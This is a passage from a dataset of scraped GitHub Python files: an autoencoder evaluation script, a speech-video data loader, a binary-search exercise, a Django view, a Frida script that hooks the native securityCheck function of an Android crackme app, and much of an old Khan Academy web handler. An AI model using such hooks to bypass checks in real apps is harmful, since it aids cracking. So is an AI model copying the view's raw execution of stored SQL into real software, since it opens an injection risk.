plt.bar(x_label,10,100, color='r')\n # plt.plot([0,70000], [x_mean, x_mean])\n # plt.xlabel(\"Frequency\")\n # plt.ylabel(\"Amplitude\")\n # plt.legend([\"Signal\", \"Threshold\", \"Select_Region\"])\n # plt.show()\n return new_x, len(new_x[0])\n \n# x, input_size = Reorganize(x)\n\ndef Greedy(evaluate_result, Model_num, sample_num, G_index = None, Threshold = None):\n TP=0\n TN=0\n FP=0\n FN=0\n\n if Threshold == None:\n sort_lose = np.sort(evaluate_result)\n Threshold = sort_lose[Model_num][G_index]\n \n for i,lose_ in enumerate(evaluate_result[Model_num]):\n if lose_ > Threshold: ##樣本lose大於當前閥值,即判定為不合格\n if (i%len(evaluate_result[Model_num]) >= Model_num*sample_num) and (i%len(evaluate_result[Model_num]) < (Model_num+1)*sample_num): ##實際為合格\n FP += 1\n else:##實際為不合格\n TP += 1\n else: ##樣本lose小於當前閥值,即判定為合格\n if (i%len(evaluate_result[Model_num]) >= Model_num*sample_num) and (i%len(evaluate_result[Model_num]) < (Model_num+1)*sample_num): ##實際為合格\n TN += 1\n else: #實際為不合格\n FN += 1\n TPR = TP/(FN+TP)\n FPR = FP/(FP+TN)\n PRE = TP/(TP+FP)\n ACC = (TP+TN)/(TP+TN+FP+FN)\n \n return TPR, FPR, PRE, ACC, TP, TN, FP, FN\n\npred_Data_test = []\npred_Data_train = []\nfor i in range(output_size*ClassSampleNum):\n if (i%ClassSampleNum >= ClassSampleNum-TestSetNum):\n pred_Data_test.append([x[i]])\n else:\n pred_Data_train.append([x[i]])\npred_Data_test = np.array(pred_Data_test)\npred_Data_train = np.array(pred_Data_train)\nprint(np.shape(pred_Data_test))\n\n##讀取所有模型\nclass_model = []\nfor i in range(output_size):\n class_model.append(load_model('./AE_Model/model_'+repr(i)+'/model_'+repr(i)+'.h5'))\n # class_model.append(tf.keras.models.load_model(\"model_\"+repr(i)+\".h5\"))\n \n##跑lose\nevaluate_result_test = []\nevaluate_result_train = []\nfor i in range(output_size):\n cc = []\n for j in range(output_size*TestSetNum):\n cc.append(class_model[i].evaluate(pred_Data_test[j],pred_Data_test[j])) ## test set\n evaluate_result_test.append(cc)\n \n cc = []\n for j in range((ClassSampleNum-TestSetNum)*output_size):\n cc.append(class_model[i].evaluate(pred_Data_train[j],pred_Data_train[j])) ## train set\n evaluate_result_train.append(cc)\nprint(\"loss :\", evaluate_result_train[0][0])","repo_name":"hello5949/PhoneLock","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"39751273523","text":"import glob\nimport numpy as np\nimport os\nimport tqdm\n\n# Import params\nfrom params import *\n\n#############################################################\n# LOAD IMAGE DIRS AND WORD NUMBERS\n#############################################################\n\ndef load_image_dirs_and_word_numbers(trainValSpeakersList = [1, 2, 3, 4, 5, 6, 7, 9],\n valSplit = 0.1,\n siList = [10, 11]):\n # TRAIN AND VAL\n trainDirs = []\n trainWordNumbers = []\n valDirs = []\n valWordNumbers = []\n np.random.seed(29)\n\n # For each speaker\n for speaker in sorted(tqdm.tqdm(trainValSpeakersList)):\n speakerDir = os.path.join(rootDir, 's' + '{0:02d}'.format(speaker))\n # List of all videos for each speaker\n vidDirs = sorted(glob.glob(os.path.join(speakerDir, '*/')))\n totalNumOfImages = len(vidDirs)\n # To shuffle directories before splitting into train and validate\n fullListIdx = list(range(totalNumOfImages))\n np.random.shuffle(fullListIdx)\n # Append training directories\n for i in fullListIdx[:int((1 - valSplit) * totalNumOfImages)]:\n for j in range(wordsPerVideo):\n trainDirs.append(vidDirs[i])\n trainWordNumbers.append(j)\n # Append val directories\n for i in fullListIdx[int((1 - valSplit) * totalNumOfImages):]:\n for j in range(wordsPerVideo):\n valDirs.append(vidDirs[i])\n valWordNumbers.append(j)\n\n # Numbers\n print(\"No. of training words: \" + str(len(trainDirs)))\n print(\"No. of val words: \" + str(len(valDirs)))\n\n # SPEAKER INDEPENDENT\n siDirs = []\n siWordNumbers = []\n for speaker in sorted(tqdm.tqdm(siList)):\n speakerDir = os.path.join(rootDir, 's' + '{0:02d}'.format(speaker))\n vidDirs = sorted(glob.glob(os.path.join(speakerDir, '*/')))\n for i in fullListIdx:\n for j in range(wordsPerVideo):\n siDirs.append(vidDirs[i])\n siWordNumbers.append(j)\n\n # Numbers\n print(\"No. of speaker-independent words: \" + str(len(siDirs)))\n\n # Return\n return trainDirs, trainWordNumbers, valDirs, valWordNumbers, siDirs, siWordNumbers\n","repo_name":"voletiv/GRIDcorpus-experiments","sub_path":"gen-images-and-words/load_image_dirs_and_word_numbers.py","file_name":"load_image_dirs_and_word_numbers.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"18"} +{"seq_id":"2637201026","text":"#나무 자르기 (실버2) 231217 ✳ 4628ms ... 시간 너무 오래 걸림\ndef solution() :\n import sys\n input = sys.stdin.readline\n\n n, m = map(int, input().split()) #나무의 수, 상근이가 가질 나무의 길이\n tree_list = list(map(int, input().split())) #나무의 높이\n\n start = 0\n end = max(tree_list) #가장 긴 나무 높이\n\n while start <= end :\n mid = (start+end) // 2\n total = 0\n\n for tree in tree_list :\n #나무 높이가 절단기 높이보다 큰 경우\n if tree > mid :\n total += (tree - mid) #나무 자름\n\n #자른 나무들의 길이가 m 이상인 경우\n if total >= m :\n start = mid + 1\n #m보다 작은 경우\n else :\n end = mid - 1\n\n print(end)","repo_name":"eun417/replit_test","sub_path":"algorithm/BinarySearch/BAEKJOON/bj_31.py","file_name":"bj_31.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13553495330","text":"from django.http import JsonResponse\nfrom django.shortcuts import get_object_or_404\nfrom django.views import View\n\nfrom baseapp.models.grafico import Grafico\n\n\nclass ListaGerarAjaxView(View):\n '''\n Adiciona um pedido via AJAX.\n :URl: http://ip_servidor/pedido/cadastrar/\n '''\n\n def get(self, request, **kwargs):\n '''\n :param request:\n :param id:\n :param kwargs: id do produto\n :return: HTML do modal\n '''\n context = {}\n data = {}\n data['form_is_valid'] = True\n data['id'] = self.kwargs.get('pk')\n data['titulo'] = 'chamados'\n data['tipo'] = 'bar'\n lista = get_object_or_404(Grafico, pk=self.kwargs.get('pk'))\n\n consulta = my_custom_sql(lista.sql)\n print(consulta)\n data['titulo'] = lista.nome\n lista = []\n for item in consulta:\n lista.append(item[0])\n data['lista'] = lista\n data['valor'] = lista\n\n return JsonResponse(data)\n\n\ndef my_custom_sql(consulta):\n from django.db import connection\n cursor = connection.cursor()\n cursor.execute(consulta)\n row = cursor.fetchall()\n return row\n","repo_name":"thiagolcdeoliveira/matrix","sub_path":"baseapp/views/ListaGerarAjax.py","file_name":"ListaGerarAjax.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29691098542","text":"import sys\n\nimport frida\n\n\ndef on_message(message, data):\n if message['type'] == 'send':\n\n print(\" {0}\".format(message['payload']))\n else:\n print(message)\n\n\nthread_backtracer = \"\"\"\n//打印lib线程调用的堆栈,显示堆栈地址成功,map名字失败\nJava.perform(function(){\n\n var f = Module.findExportByName('libcrackme.so', 'Java_com_yaotong_crackme_MainActivity_securityCheck');\n \n Interceptor.attach(f, {\n onEnter: function(args){\n console.log(Thread.backtrace(this.context, Backtracer.ACCURATE))\n console.log(Thread.backtrace(this.context, Backtracer.ACCURATE).map(DebugSymbol.fromaddress))\n }\n })\n \n\n\n\n});\n\n\n\"\"\"\n\nif __name__ == '__main__':\n process = frida.get_device_manager().enumerate_devices()[-1].attach(\n \"com.yaotong.crackme\")\n script = process.create_script(thread_backtracer)\n script.on('message', on_message)\n script.load()\n sys.stdin.read()\n","repo_name":"kylezb/useful","sub_path":"examples/useful_python/examples/frida_hook/frida_studuy.py","file_name":"frida_studuy.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37615916628","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport os\nimport urllib\nimport urlparse\nimport logging\nimport re\n\nfrom google.appengine.runtime.apiproxy_errors import CapabilityDisabledError\nfrom google.appengine.api import users\nfrom google.appengine.ext.webapp.util import run_wsgi_app\nfrom google.appengine.ext import db\n\nimport webapp2\n\nimport devpanel\nimport bulk_update.handler\nimport request_cache\nfrom gae_mini_profiler import profiler\nfrom gae_bingo.middleware import GAEBingoWSGIMiddleware\nimport autocomplete\nimport coaches\nimport knowledgemap\nimport consts\nimport youtube_sync\nimport warmup\nimport library\nimport homepage\nimport nl\nimport nl_report\n\nimport search\n\nimport request_handler\nfrom app import App\nimport util\nimport user_util\nimport exercise_statistics\nimport activity_summary\nimport exercises\nimport dashboard\nimport exercisestats.report\nimport exercisestats.report_json\nimport github\nimport paypal\nimport smarthistory\nimport goals.handlers\n\nimport models\nfrom models import UserData, Video, Playlist, VideoPlaylist, ExerciseVideo, UserVideo, VideoLog\nfrom discussion import comments, notification, qa, voting\nfrom about import blog, util_about\nfrom phantom_users import util_notify\nfrom badges import util_badges, custom_badges\nfrom mailing_lists import util_mailing_lists\nfrom profiles import util_profile\nfrom custom_exceptions import MissingVideoException\nfrom templatetags import user_points\nfrom oauth_provider import apps as oauth_apps\nfrom phantom_users.phantom_util import create_phantom, get_phantom_user_id_from_cookies\nfrom phantom_users.cloner import Clone\nfrom counters import user_counter\nfrom notifications import UserNotifier\nfrom nicknames import get_nickname_for\nfrom image_cache import ImageCache\nfrom api.auth.xsrf import ensure_xsrf_cookie\nimport redirects\nimport robots\nfrom gae_bingo.gae_bingo import bingo\n\nclass VideoDataTest(request_handler.RequestHandler):\n\n @user_util.developer_only\n def get(self):\n self.response.out.write('')\n videos = Video.all()\n for video in videos:\n self.response.out.write('

    Title: ' + video.title)\n\n\nclass DeleteVideoPlaylists(request_handler.RequestHandler):\n# Deletes at most 200 Video-Playlist associations that are no longer live. Should be run every-now-and-then to make sure the table doesn't get too big\n @user_util.developer_only\n def get(self):\n query = VideoPlaylist.all()\n all_video_playlists = query.fetch(200)\n video_playlists_to_delete = []\n for video_playlist in all_video_playlists:\n if video_playlist.live_association != True:\n video_playlists_to_delete.append(video_playlist)\n db.delete(video_playlists_to_delete)\n\n\nclass KillLiveAssociations(request_handler.RequestHandler):\n @user_util.developer_only\n def get(self):\n query = VideoPlaylist.all()\n all_video_playlists = query.fetch(100000)\n for video_playlist in all_video_playlists:\n video_playlist.live_association = False\n db.put(all_video_playlists)\n\ndef get_mangled_playlist_name(playlist_name):\n for char in \" :()\":\n playlist_name = playlist_name.replace(char, \"\")\n return playlist_name\n\nclass ViewVideo(request_handler.RequestHandler):\n\n @ensure_xsrf_cookie\n def get(self, readable_id=\"\"):\n\n # This method displays a video in the context of a particular playlist.\n # To do that we first need to find the appropriate playlist. If we aren't\n # given the playlist title in a query param, we need to find a playlist that\n # the video is a part of. That requires finding the video, given it readable_id\n # or, to support old URLs, it's youtube_id.\n video = None\n playlist = None\n video_id = self.request.get('v')\n playlist_title = self.request_string('playlist', default=\"\") or self.request_string('p', default=\"\")\n\n readable_id = urllib.unquote(readable_id)\n readable_id = re.sub('-+$', '', readable_id) # remove any trailing dashes (see issue 1140)\n\n # If either the readable_id or playlist title is missing,\n # redirect to the canonical URL that contains them\n redirect_to_canonical_url = False\n if video_id: # Support for old links\n query = Video.all()\n query.filter('youtube_id =', video_id)\n video = query.get()\n\n if not video:\n raise MissingVideoException(\"Missing video w/ youtube id '%s'\" % video_id)\n\n readable_id = video.readable_id\n playlist = video.first_playlist()\n\n if not playlist:\n raise MissingVideoException(\"Missing video w/ youtube id '%s'\" % video_id)\n\n redirect_to_canonical_url = True\n\n if playlist_title is not None and len(playlist_title) > 0:\n query = Playlist.all().filter('title =', playlist_title)\n key_id = 0\n for p in query:\n if p.key().id() > key_id and not p.youtube_id.endswith('_player'):\n playlist = p\n key_id = p.key().id()\n\n # If a playlist_title wasn't specified or the specified playlist wasn't found\n # use the first playlist for the requested video.\n if playlist is None:\n # Get video by readable_id just to get the first playlist for the video\n video = Video.get_for_readable_id(readable_id)\n if video is None:\n raise MissingVideoException(\"Missing video '%s'\" % readable_id)\n\n playlist = video.first_playlist()\n if not playlist:\n raise MissingVideoException(\"Missing video '%s'\" % readable_id)\n\n redirect_to_canonical_url = True\n\n exid = self.request_string('exid', default=None)\n\n if redirect_to_canonical_url:\n qs = {'playlist': playlist.title}\n if exid:\n qs['exid'] = exid\n\n urlpath = \"/video/%s\" % urllib.quote(readable_id)\n url = urlparse.urlunparse(('', '', urlpath, '', urllib.urlencode(qs), ''))\n self.redirect(url, True)\n return\n\n # If we got here, we have a readable_id and a playlist_title, so we can display\n # the playlist and the video in it that has the readable_id. Note that we don't\n # query the Video entities for one with the requested readable_id because in some\n # cases there are multiple Video objects in the datastore with the same readable_id\n # (e.g. there are 2 \"Order of Operations\" videos).\n\n videos = VideoPlaylist.get_cached_videos_for_playlist(playlist)\n previous_video = None\n next_video = None\n for v in videos:\n if v.readable_id == readable_id:\n v.selected = 'selected'\n video = v\n elif video is None:\n previous_video = v\n elif next_video is None:\n next_video = v\n\n if video is None:\n raise MissingVideoException(\"Missing video '%s'\" % readable_id)\n\n if App.offline_mode:\n video_path = \"/videos/\" + get_mangled_playlist_name(playlist_title) + \"/\" + video.readable_id + \".flv\"\n else:\n video_path = video.download_video_url()\n\n if video.description == video.title:\n video.description = None\n\n related_exercises = video.related_exercises()\n button_top_exercise = None\n if related_exercises:\n def ex_to_dict(exercise):\n return {\n 'name': exercise.display_name,\n 'url': exercise.relative_url,\n }\n button_top_exercise = ex_to_dict(related_exercises[0])\n\n user_video = UserVideo.get_for_video_and_user_data(video, UserData.current(), insert_if_missing=True)\n\n awarded_points = 0\n if user_video:\n awarded_points = user_video.points\n\n template_values = {\n 'playlist': playlist,\n 'video': video,\n 'videos': videos,\n 'video_path': video_path,\n 'video_points_base': consts.VIDEO_POINTS_BASE,\n 'button_top_exercise': button_top_exercise,\n 'related_exercises': [], # disabled for now\n 'previous_video': previous_video,\n 'next_video': next_video,\n 'selected_nav_link': 'watch',\n 'awarded_points': awarded_points,\n 'issue_labels': ('Component-Videos,Video-%s' % readable_id),\n 'author_profile': 'https://plus.google.com/103970106103092409324'\n }\n template_values = qa.add_template_values(template_values, self.request)\n\n bingo(['struggling_videos_landing',\n 'homepage_restructure_videos_landing'])\n self.render_jinja2_template('viewvideo.html', template_values)\n\nclass ReportIssue(request_handler.RequestHandler):\n\n def get(self):\n issue_type = self.request.get('type')\n self.write_response(issue_type, {'issue_labels': self.request.get('issue_labels'),})\n\n def write_response(self, issue_type, extra_template_values):\n user_agent = self.request.headers.get('User-Agent')\n if user_agent is None:\n user_agent = ''\n user_agent = user_agent.replace(',',';') # Commas delimit labels, so we don't want them\n template_values = {\n 'referer': self.request.headers.get('Referer'),\n 'user_agent': user_agent,\n }\n template_values.update(extra_template_values)\n page = 'reportissue_template.html'\n if issue_type == 'Defect':\n page = 'reportproblem.html'\n elif issue_type == 'Enhancement':\n page = 'makesuggestion.html'\n elif issue_type == 'New-Video':\n page = 'requestvideo.html'\n elif issue_type == 'Comment':\n page = 'makecomment.html'\n elif issue_type == 'Question':\n page = 'askquestion.html'\n\n self.render_jinja2_template(page, template_values)\n\nclass Crash(request_handler.RequestHandler):\n def get(self):\n if self.request_bool(\"capability_disabled\", default=False):\n raise CapabilityDisabledError(\"Simulate scheduled GAE downtime\")\n else:\n # Even Watson isn't perfect\n raise Exception(\"What is Toronto?\")\n\nclass ReadOnlyDowntime(request_handler.RequestHandler):\n def get(self):\n raise CapabilityDisabledError(\"App Engine maintenance period\")\n\n def post(self):\n return self.get()\n\nclass SendToLog(request_handler.RequestHandler):\n def post(self):\n message = self.request_string(\"message\", default=\"\")\n if message:\n logging.critical(\"Manually sent to log: %s\" % message)\n\nclass MobileFullSite(request_handler.RequestHandler):\n def get(self):\n self.set_mobile_full_site_cookie(True)\n self.redirect(\"/\")\n\nclass MobileSite(request_handler.RequestHandler):\n def get(self):\n self.set_mobile_full_site_cookie(False)\n self.redirect(\"/\")\n\nclass ViewFAQ(request_handler.RequestHandler):\n def get(self):\n self.redirect(\"/about/faq\", True)\n return\n\nclass ViewGetInvolved(request_handler.RequestHandler):\n def get(self):\n self.redirect(\"/contribute\", True)\n\nclass ViewContribute(request_handler.RequestHandler):\n def get(self):\n self.render_jinja2_template('contribute.html', {\"selected_nav_link\": \"contribute\"})\n\nclass ViewCredits(request_handler.RequestHandler):\n def get(self):\n self.render_jinja2_template('viewcredits.html', {\"selected_nav_link\": \"contribute\"})\n\nclass Donate(request_handler.RequestHandler):\n def get(self):\n self.redirect(\"/contribute\", True)\n\nclass ViewTOS(request_handler.RequestHandler):\n def get(self):\n self.render_jinja2_template('tos.html', {\"selected_nav_link\": \"tos\"})\n\nclass ViewAPITOS(request_handler.RequestHandler):\n def get(self):\n self.render_jinja2_template('api-tos.html', {\"selected_nav_link\": \"api-tos\"})\n\nclass ViewPrivacyPolicy(request_handler.RequestHandler):\n def get(self):\n self.render_jinja2_template('privacy-policy.html', {\"selected_nav_link\": \"privacy-policy\"})\n\nclass ViewDMCA(request_handler.RequestHandler):\n def get(self):\n self.render_jinja2_template('dmca.html', {\"selected_nav_link\": \"dmca\"})\n\nclass ViewSAT(request_handler.RequestHandler):\n\n def get(self):\n playlist_title = \"SAT Preparation\"\n query = Playlist.all()\n query.filter('title =', playlist_title)\n playlist = query.get()\n query = VideoPlaylist.all()\n query.filter('playlist =', playlist)\n query.filter('live_association = ', True) #need to change this to true once I'm done with all of my hacks\n query.order('video_position')\n playlist_videos = query.fetch(500)\n\n template_values = {\n 'videos': playlist_videos,\n }\n\n self.render_jinja2_template('sat.html', template_values)\n\nclass ViewGMAT(request_handler.RequestHandler):\n\n def get(self):\n problem_solving = VideoPlaylist.get_query_for_playlist_title(\"GMAT: Problem Solving\")\n data_sufficiency = VideoPlaylist.get_query_for_playlist_title(\"GMAT Data Sufficiency\")\n template_values = {\n 'data_sufficiency': data_sufficiency,\n 'problem_solving': problem_solving,\n }\n\n self.render_jinja2_template('gmat.html', template_values)\n\n\nclass RetargetFeedback(bulk_update.handler.UpdateKind):\n def get_keys_query(self, kind):\n \"\"\"Returns a keys-only query to get the keys of the entities to update\"\"\"\n return db.GqlQuery('select __key__ from Feedback')\n\n def use_transaction(self):\n return False\n\n def update(self, feedback):\n orig_video = feedback.video()\n\n if orig_video == None or type(orig_video).__name__ != \"Video\":\n return False\n readable_id = orig_video.readable_id\n query = Video.all()\n query.filter('readable_id =', readable_id)\n # The database currently contains multiple Video objects for a particular\n # video. Some are old. Some are due to a YouTube sync where the youtube urls\n # changed and our code was producing youtube_ids that ended with '_player'.\n # This hack gets the most recent valid Video object.\n key_id = 0\n for v in query:\n if v.key().id() > key_id and not v.youtube_id.endswith('_player'):\n video = v\n key_id = v.key().id()\n # End of hack\n if video is not None and video.key() != orig_video.key():\n logging.info(\"Retargeting Feedback %s from Video %s to Video %s\", feedback.key().id(), orig_video.key().id(), video.key().id())\n feedback.targets[0] = video.key()\n return True\n else:\n return False\n\nclass ChangeEmail(bulk_update.handler.UpdateKind):\n\n def get_email_params(self):\n old_email = self.request.get('old')\n new_email = self.request.get('new')\n prop = self.request.get('prop')\n if old_email is None or len(old_email) == 0:\n raise Exception(\"parameter 'old' is required\")\n if new_email is None or len(new_email) == 0:\n new_email = old_email\n if prop is None or len(prop) == 0:\n prop = \"user\"\n return (old_email, new_email, prop)\n\n def get(self):\n (old_email, new_email, prop) = self.get_email_params()\n if new_email == old_email:\n return bulk_update.handler.UpdateKind.get(self)\n self.response.out.write(\"To prevent a CSRF attack from changing email addresses, you initiate an email address change from the browser. \")\n self.response.out.write(\"Instead, run the following from remote_api_shell.py.

    \\n\")\n        self.response.out.write(\"import bulk_update.handler\\n\")\n        self.response.out.write(\"bulk_update.handler.start_task('%s',{'kind':'%s', 'old':'%s', 'new':'%s'})\\n\"\n                                % (self.request.path, self.request.get('kind'), old_email, new_email))\n        self.response.out.write(\"
    and then check the logs in the admin console\")\n\n\n def get_keys_query(self, kind):\n \"\"\"Returns a keys-only query to get the keys of the entities to update\"\"\"\n\n (old_email, new_email, prop) = self.get_email_params()\n # When a user's personal Google account is replaced by their transitioned Google Apps account with the same email,\n # the Google user ID changes and the new User object's are not considered equal to the old User object's with the same\n # email, so querying the datastore for entities referring to users with the same email return nothing. However an inequality\n # query will return the relevant entities.\n gt_user = users.User(old_email[:-1] + chr(ord(old_email[-1])-1) + chr(127))\n lt_user = users.User(old_email + chr(0))\n return db.GqlQuery(('select __key__ from %s where %s > :1 and %s < :2' % (kind, prop, prop)), gt_user, lt_user)\n\n def use_transaction(self):\n return False\n\n def update(self, entity):\n (old_email, new_email, prop) = self.get_email_params()\n if getattr(entity, prop).email() != old_email:\n # This should never occur, but just in case, don't change or reput the entity.\n return False\n setattr(entity, prop, users.User(new_email))\n return True\n\nclass Login(request_handler.RequestHandler):\n def get(self):\n return self.post()\n\n def post(self):\n cont = self.request_string('continue', default = \"/\")\n direct = self.request_bool('direct', default = False)\n\n openid_identifier = self.request.get('openid_identifier')\n if openid_identifier is not None and len(openid_identifier) > 0:\n if App.accepts_openid:\n self.redirect(users.create_login_url(cont, federated_identity = openid_identifier))\n return\n self.redirect(users.create_login_url(cont))\n return\n\n if App.facebook_app_secret is None:\n self.redirect(users.create_login_url(cont))\n return\n template_values = {\n 'continue': cont,\n 'direct': direct\n }\n self.render_jinja2_template('login.html', template_values)\n\nclass MobileOAuthLogin(request_handler.RequestHandler):\n def get(self):\n self.render_jinja2_template('login_mobile_oauth.html', {\n \"oauth_map_id\": self.request_string(\"oauth_map_id\", default=\"\"),\n \"anointed\": self.request_bool(\"an\", default=False),\n \"view\": self.request_string(\"view\", default=\"\")\n })\n\nclass PostLogin(request_handler.RequestHandler):\n def get(self):\n cont = self.request_string('continue', default = \"/\")\n\n # Immediately after login we make sure this user has a UserData entity\n user_data = UserData.current()\n if user_data:\n\n # Update email address if it has changed\n current_google_user = users.get_current_user()\n if current_google_user and current_google_user.email() != user_data.email:\n user_data.user_email = current_google_user.email()\n user_data.put()\n\n # Update nickname if it has changed\n current_nickname = get_nickname_for(user_data)\n if user_data.user_nickname != current_nickname:\n user_data.user_nickname = current_nickname\n user_data.put()\n\n # Set developer and moderator to True if user is admin\n if (not user_data.developer or not user_data.moderator) and users.is_current_user_admin():\n user_data.developer = True\n user_data.moderator = True\n user_data.put()\n\n # If user is brand new and has 0 points, migrate data\n phantom_id = get_phantom_user_id_from_cookies()\n if phantom_id:\n phantom_data = UserData.get_from_db_key_email(phantom_id)\n\n # First make sure user has 0 points and phantom user has some activity\n if user_data.points == 0 and phantom_data and phantom_data.points > 0:\n\n # Make sure user has no students\n if not user_data.has_students():\n\n # Clear all \"login\" notifications\n UserNotifier.clear_all(phantom_data)\n\n # Update phantom user_data to real user_data\n phantom_data.user_id = user_data.user_id\n phantom_data.current_user = user_data.current_user\n phantom_data.user_email = user_data.user_email\n phantom_data.user_nickname = user_data.user_nickname\n\n if phantom_data.put():\n # Phantom user was just transitioned to real user\n user_counter.add(1)\n user_data.delete()\n\n cont = \"/newaccount?continue=%s\" % cont\n else:\n\n # If nobody is logged in, clear any expired Facebook cookie that may be hanging around.\n self.delete_cookie(\"fbsr_\" + App.facebook_app_id)\n self.delete_cookie(\"fbs_\" + App.facebook_app_id)\n\n logging.critical(\"Missing UserData during PostLogin, with id: %s, cookies: (%s), google user: %s\" % (\n util.get_current_user_id(), os.environ.get('HTTP_COOKIE', ''), users.get_current_user()\n )\n )\n\n # Always delete phantom user cookies on login\n self.delete_cookie('ureg_id')\n\n self.redirect(cont)\n\nclass Logout(request_handler.RequestHandler):\n def get(self):\n self.delete_cookie('ureg_id')\n self.redirect(users.create_logout_url(self.request_string(\"continue\", default=\"/\")))\n\nclass Search(request_handler.RequestHandler):\n\n def get(self):\n query = self.request.get('page_search_query')\n template_values = {'page_search_query': query}\n query = query.strip()\n if len(query) < search.SEARCH_PHRASE_MIN_LENGTH:\n if len(query) > 0:\n template_values.update({\n 'query_too_short': search.SEARCH_PHRASE_MIN_LENGTH\n })\n self.render_jinja2_template(\"searchresults.html\", template_values)\n return\n searched_phrases = []\n\n # Do an async query for all ExerciseVideos, since this may be slow\n exvids_query = ExerciseVideo.all()\n exvids_future = util.async_queries([exvids_query])\n\n # One full (non-partial) search, then sort by kind\n all_text_keys = Playlist.full_text_search(\n query, limit=50, kind=None,\n stemming=Playlist.INDEX_STEMMING,\n multi_word_literal=Playlist.INDEX_MULTI_WORD,\n searched_phrases_out=searched_phrases)\n\n\n # Quick title-only partial search\n playlist_partial_results = filter(\n lambda playlist_dict: query in playlist_dict[\"title\"].lower(),\n autocomplete.playlist_title_dicts())\n video_partial_results = filter(\n lambda video_dict: query in video_dict[\"title\"].lower(),\n autocomplete.video_title_dicts())\n\n # Combine results & do one big get!\n all_key_list = [str(key_and_title[0]) for key_and_title in all_text_keys]\n #all_key_list.extend([result[\"key\"] for result in playlist_partial_results])\n all_key_list.extend([result[\"key\"] for result in video_partial_results])\n all_key_list = list(set(all_key_list))\n all_entities = db.get(all_key_list)\n\n # Filter results by type\n playlists = []\n videos = []\n for entity in all_entities:\n if isinstance(entity, Playlist):\n playlists.append(entity)\n elif isinstance(entity, Video):\n videos.append(entity)\n elif entity is not None:\n logging.error(\"Unhandled kind in search results: \" +\n str(type(entity)))\n\n playlist_count = len(playlists)\n\n # Get playlists for videos not in matching playlists\n filtered_videos = []\n filtered_videos_by_key = {}\n for video in videos:\n if [(playlist.title in video.playlists) for playlist in playlists].count(True) == 0:\n video_playlist = video.first_playlist()\n if video_playlist != None:\n playlists.append(video_playlist)\n filtered_videos.append(video)\n filtered_videos_by_key[str(video.key())] = []\n else:\n filtered_videos.append(video)\n filtered_videos_by_key[str(video.key())] = []\n video_count = len(filtered_videos)\n\n # Get the related exercises\n all_exercise_videos = exvids_future[0].get_result()\n exercise_keys = []\n for exvid in all_exercise_videos:\n video_key = str(ExerciseVideo.video.get_value_for_datastore(exvid))\n if video_key in filtered_videos_by_key:\n exercise_key = ExerciseVideo.exercise.get_value_for_datastore(exvid)\n video_exercise_keys = filtered_videos_by_key[video_key]\n video_exercise_keys.append(exercise_key)\n exercise_keys.append(exercise_key)\n exercises = db.get(exercise_keys)\n\n # Sort exercises with videos\n video_exercises = {}\n for video_key, exercise_keys in filtered_videos_by_key.iteritems():\n video_exercises[video_key] = map(lambda exkey: [exercise for exercise in exercises if exercise.key() == exkey][0], exercise_keys)\n\n # Count number of videos in each playlist and sort descending\n for playlist in playlists:\n if len(filtered_videos) > 0:\n playlist.match_count = [(playlist.title in video.playlists) for video in filtered_videos].count(True)\n else:\n playlist.match_count = 0\n playlists = sorted(playlists, key=lambda playlist: -playlist.match_count)\n\n template_values.update({\n 'playlists': playlists,\n 'videos': filtered_videos,\n 'video_exercises': video_exercises,\n 'search_string': query,\n 'video_count': video_count,\n 'playlist_count': playlist_count,\n })\n self.render_jinja2_template(\"searchresults.html\", template_values)\n\nclass RedirectToJobvite(request_handler.RequestHandler):\n def get(self):\n self.redirect(\"http://hire.jobvite.com/CompanyJobs/Careers.aspx?k=JobListing&c=qd69Vfw7\")\n\nclass RedirectToToolkit(request_handler.RequestHandler):\n def get(self):\n self.redirect(\"https://sites.google.com/a/khanacademy.org/schools/\")\n\nclass PermanentRedirectToHome(request_handler.RequestHandler):\n def get(self):\n\n redirect_target = \"/\"\n relative_path = self.request.path.rpartition('/')[2].lower()\n\n # Permanently redirect old JSP version of the site to home\n # or, in the case of some special targets, to their appropriate new URL\n dict_redirects = {\n \"sat.jsp\": \"/sat\",\n \"gmat.jsp\": \"/gmat\",\n }\n\n if dict_redirects.has_key(relative_path):\n redirect_target = dict_redirects[relative_path]\n\n self.redirect(redirect_target, True)\n\nclass ServeUserVideoCss(request_handler.RequestHandler):\n def get(self):\n user_data = UserData.current()\n if user_data == None:\n return\n\n user_video_css = models.UserVideoCss.get_for_user_data(user_data)\n self.response.headers['Content-Type'] = 'text/css'\n\n if user_video_css.version == user_data.uservideocss_version:\n # Don't cache if there's a version mismatch and update isn't finished\n self.response.headers['Cache-Control'] = 'public,max-age=1000000'\n\n self.response.out.write(user_video_css.video_css)\n\nclass RealtimeEntityCount(request_handler.RequestHandler):\n def get(self):\n if not App.is_dev_server:\n raise Exception(\"Only works on dev servers.\")\n default_kinds = 'Exercise'\n kinds = self.request_string(\"kinds\", default_kinds).split(',')\n for kind in kinds:\n count = getattr(models, kind).all().count(10000)\n self.response.out.write(\"%s: %d
